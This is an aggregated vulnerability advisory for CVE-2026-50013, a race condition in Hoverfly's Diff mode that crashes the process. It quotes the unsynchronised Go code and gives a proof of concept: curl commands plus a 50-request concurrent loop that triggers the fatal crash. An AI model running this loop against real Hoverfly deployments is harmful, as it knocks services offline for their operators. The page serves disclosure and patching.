🛡️ CVE-2026-50013 — hoverfly

🟠 CVSS 8.0 — High ✅ No Known Exploit CWE-362 OSV
8.0
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

Hoverfly: Process Crash via Concurrent Map Write Race Condition in Diff Mode

Summary:

When Hoverfly is running in Diff mode, the AddDiff() function writes to the shared responsesDiff map without any synchronization (no mutex). When multiple proxy requests are processed concurrently (the normal case for any proxy), the concurrent map writes trigger Go's built-in race detector which causes a fatal error: concurrent map read and map write, immediately killing the entire Hoverfly process. This is trivially exploitable by sending multiple simultaneous requests.

Details:

1. Unsynchronized map access in AddDiff() (core/hoverfly_service.go:417-421):

```go

func (hf *Hoverfly) AddDiff(requestView v2.SimpleRequestDefinitionView, diffReport v2.DiffReport) {

if len(diffReport.DiffEntries) > 0 {

diffs := hf.responsesDiff[requestView] // UNSYNCHRONIZED READ

hf.responsesDiff[requestView] = append(diffs, diffReport) // UNSYNCHRONIZED WRITE

}

}

```

2. This function is called from Diff mode processing, which runs concurrently per request (core/modes/diff_mode.go):

Each incoming proxy request is handled in its own goroutine by Go's net/http server. In Diff mode, each request calls AddDiff() after comparing the simulated and actual responses. With multiple concurrent requests, multiple goroutines write to the same map simultaneously.

3. Go's runtime detects concurrent map access and terminates the process:

Unlike data races on simple values (which produce undefined behavior silently), Go's map implementation includes a built-in concurrent access check. When two goroutines access the same map and at least one is writing, the runtime calls fatal() which is unrecoverable, it cannot be caught by recover().

4. No mutex protection exists on responsesDiff:

The field is declared as a plain map[v2.SimpleRequestDefinitionView][]v2.DiffReport with no associated sync.RWMutex. Compare with hf.state which properly uses sync.RWMutex for its map access.

Environment:

  • Hoverfly version: v1.12.7
  • Operating System: macOS Darwin 25.4.0
  • Go version: 1.26.2
  • Configuration: Hoverfly in Diff mode (PUT /api/v2/hoverfly/mode {"mode":"diff"})

POC:

Step 1: Start Hoverfly and set Diff mode

```bash

./hoverfly &

sleep 2

# Set diff mode

curl -X PUT http://localhost:8888/api/v2/hoverfly/mode \

-H "Content-Type: application/json" \

-d '{"mode": "diff"}'

# Load a simulation for diff comparison

curl -X PUT http://localhost:8888/api/v2/simulation \

-H "Content-Type: application/json" \

-d '{

"data": {

"pairs": [{

"request": {"path": [{"matcher": "glob", "value": "*"}]},

"response": {"status": 200, "body": "expected"}

}],

"globalActions": {"delays": [], "delaysLogNormal": []}

},

"meta": {"schemaVersion": "v5.2"}

}'

```

Step 2: Send concurrent requests to trigger the race

```bash

# Send 50 concurrent requests, race condition triggers within seconds

for i in $(seq 1 50); do

curl -s -x http://localhost:8500 "http://httpbin.org/get?id=$i" &

done

wait

```

Step 3: Observe the crash

```bash

# Check if process is still running

pgrep -f hoverfly

```

crash output on Hoverfly v1.12.7:

```

fatal error: concurrent map read and map write

goroutine 892 [running]:

github.com/SpectoLabs/hoverfly/core.(*Hoverfly).AddDiff(...)

/core/hoverfly_service.go:419

github.com/SpectoLabs/hoverfly/core/modes.(*DiffMode).Process(...)

```

The process crashes with ~50 concurrent requests. In production with real traffic, it crashes almost immediately.

Impact:

  • Full denial of service: The process terminates immediately and cannot be recovered without a restart
  • Trivial exploitation: Any attacker with proxy access can trigger this by sending multiple concurrent requests
  • No admin API access required: Only proxy port access is needed to trigger the crash
  • Unrecoverable: fatal error in Go cannot be caught by recover() — the process is unconditionally killed
  • Affects all Diff mode users: Any team using Diff mode for API comparison testing is vulnerable

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs no privileges on the target. No user interaction is required. The scope is unchanged, so the impact stays within the vulnerable component. Rated impact: confidentiality none, integrity none, availability high.

Weakness class

CVE-2026-50013 is classified as CWE-362: Race Condition. Concurrent operations share state without proper synchronisation, so timing decides whether the result is correct.

Affected software

CVE-2026-50013 is recorded against 1 package.

  • github.com/spectolabs/hoverfly

Timeline and source

Published on 14 July 2026 and last revised on 21 July 2026. No public exploit is currently recorded for this entry. A vendor advisory or fix has been published. Record sourced from OSV.

References

github.com (Web)
github.com (Web)
github.com (Package)
github.com (Web)

Details

Severity HIGH
CVSS Score 8.0
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE CWE-362
Public Exploit ✅ No
Source OSV
Published 2026-07-14
Updated 2026-08-12
Modified 2026-07-21

Affected Packages

Software From version Fixed in
github.com/spectolabs/hoverfly

Similar Threats

Site Security Check

Is hoverfly part of your stack?

CVE-2026-50013 is rated CVSS 8.0 High. BotEraser scans your installation against known CVE records and tells you whether this vulnerability applies to the versions you actually run.

Scan My Site Free →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.